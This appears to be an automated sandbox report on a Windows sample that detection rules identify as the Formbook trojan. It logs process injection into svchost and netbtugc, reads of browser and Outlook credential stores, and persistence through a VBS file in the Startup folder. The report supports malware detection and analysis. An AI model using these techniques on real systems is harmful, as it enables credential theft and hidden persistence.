Source: C:\Users\user\AppData\Local\directory\.exe	Code function: String function: 00B58B40 appears 42 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034BF290 appears 102 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0342B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03475130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03487E54 appears 106 times
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: String function: 00D07F41 appears 35 times
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: String function: 00D28B40 appears 42 times
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: String function: 00D20D27 appears 70 times

Source: N2sgk6jMa2.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4246901497.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4248136482.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1935910510.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1936252078.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4248067073.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4248204610.00000000043F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4250197386.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1937067974.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/9@18/13

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D6A2D5 GetLastError,FormatMessageW,

0_2_00D6A2D5

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D58713 AdjustTokenPrivileges,CloseHandle,	0_2_00D58713
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D58CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_00D58CC3
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B88713 AdjustTokenPrivileges,CloseHandle,	1_2_00B88713
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B88CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	1_2_00B88CC3

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D6B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00D6B59E

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D7F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00D7F121

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D786D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00D786D0

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D04FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00D04FE9

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

File created: C:\Users\user\AppData\Local\directory

Jump to behavior

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

File created: C:\Users\user\AppData\Local\Temp\autEC29.tmp

Jump to behavior

Source: N2sgk6jMa2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: netbtugc.exe, 00000004.00000003.2114944059.0000000003353000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4247312315.0000000003353000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2114797747.0000000003332000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: N2sgk6jMa2.exe	Virustotal: Detection: 50%
Source: N2sgk6jMa2.exe	ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

File read: C:\Users\user\Desktop\N2sgk6jMa2.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\N2sgk6jMa2.exe "C:\Users\user\Desktop\N2sgk6jMa2.exe"
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Process created: C:\Users\user\AppData\Local\directory\.exe "C:\Users\user\Desktop\N2sgk6jMa2.exe"
Source: C:\Users\user\AppData\Local\directory\.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\N2sgk6jMa2.exe"
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Process created: C:\Users\user\AppData\Local\directory\.exe "C:\Users\user\Desktop\N2sgk6jMa2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\N2sgk6jMa2.exe"	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: N2sgk6jMa2.exe

Static file information: File size 1226752 > 1048576

Source: N2sgk6jMa2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: N2sgk6jMa2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: N2sgk6jMa2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: N2sgk6jMa2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: N2sgk6jMa2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: N2sgk6jMa2.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: N2sgk6jMa2.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fIuefTlcmxsHvlw.exe, 00000003.00000000.1859889924.000000000011E000.00000002.00000001.01000000.00000005.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000000.2003656321.000000000011E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: .exe, 00000001.00000003.1797450549.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, .exe, 00000001.00000003.1796711793.0000000003DF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1842614640.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1936576903.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1936576903.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844295077.0000000003200000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4248486732.00000000037B0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1938445048.0000000003607000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1936233369.000000000345F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4248486732.000000000394E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: .exe, 00000001.00000003.1797450549.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, .exe, 00000001.00000003.1796711793.0000000003DF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1842614640.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1936576903.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1936576903.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844295077.0000000003200000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4248486732.00000000037B0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1938445048.0000000003607000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1936233369.000000000345F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4248486732.000000000394E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.1936398825.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1905265049.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000003.00000002.4247501802.00000000012F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4247312315.00000000032CE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4249071276.0000000003DDC000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000000.2004516587.000000000316C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2223941965.000000001EFFC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4247312315.00000000032CE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4249071276.0000000003DDC000.00000004.10000000.00040000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000008.00000000.2004516587.000000000316C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2223941965.000000001EFFC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.1936398825.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1905265049.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, fIuefTlcmxsHvlw.exe, 00000003.00000002.4247501802.00000000012F8000.00000004.00000020.00020000.00000000.sdmp

Source: N2sgk6jMa2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: N2sgk6jMa2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: N2sgk6jMa2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: N2sgk6jMa2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: N2sgk6jMa2.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D7C304 LoadLibraryA,GetProcAddress,

0_2_00D7C304

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D68719 push FFFFFF8Bh; iretd	0_2_00D6871B
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D2E94F push edi; ret	0_2_00D2E951
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D2EA68 push esi; ret	0_2_00D2EA6A
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D28B85 push ecx; ret	0_2_00D28B98
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D2EC43 push esi; ret	0_2_00D2EC45
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D2ED2C push edi; ret	0_2_00D2ED2E
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B98719 push FFFFFF8Bh; iretd	1_2_00B9871B
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B5E94F push edi; ret	1_2_00B5E951
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B5EA68 push esi; ret	1_2_00B5EA6A
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B58B85 push ecx; ret	1_2_00B58B98
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B5EC43 push esi; ret	1_2_00B5EC45
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B5ED2C push edi; ret	1_2_00B5ED2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004048A9 push esp; ret	2_2_004048AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E2BA push 00000038h; iretd	2_2_0041E2BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A436 push ebx; iretd	2_2_0041A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418C92 pushad ; retf	2_2_00418C93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A5D9 push ebx; iretd	2_2_0041A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004017E5 push ebp; retf 003Fh	2_2_004017E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403780 push eax; ret	2_2_00403782
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004147A2 push es; iretd	2_2_004147AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340225F pushad ; ret	2_2_034027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034027FA pushad ; ret	2_2_034027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx	2_2_034309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340283D push eax; iretd	2_2_03402858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340135E push eax; iretd	2_2_03401369

Persistence and Installation Behavior

Creates executable files without a name

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

File created: C:\Users\user\AppData\Local\directory\.exe

Jump to behavior

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

File created: C:\Users\user\AppData\Local\directory\.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\directory\.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\directory\.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\directory\.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.vbs

Jump to behavior

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D04A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_00D04A35
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D855FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_00D855FD
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B34A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	1_2_00B34A35
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00BB55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	1_2_00BB55FD

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

